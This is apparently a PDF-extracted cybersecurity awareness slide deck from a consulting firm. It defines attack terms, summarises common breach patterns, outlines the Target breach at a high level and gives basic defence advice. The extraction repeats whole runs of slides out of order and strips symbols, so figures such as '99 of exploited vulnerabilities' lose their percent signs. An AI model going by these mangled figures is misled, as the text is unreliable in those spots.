KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
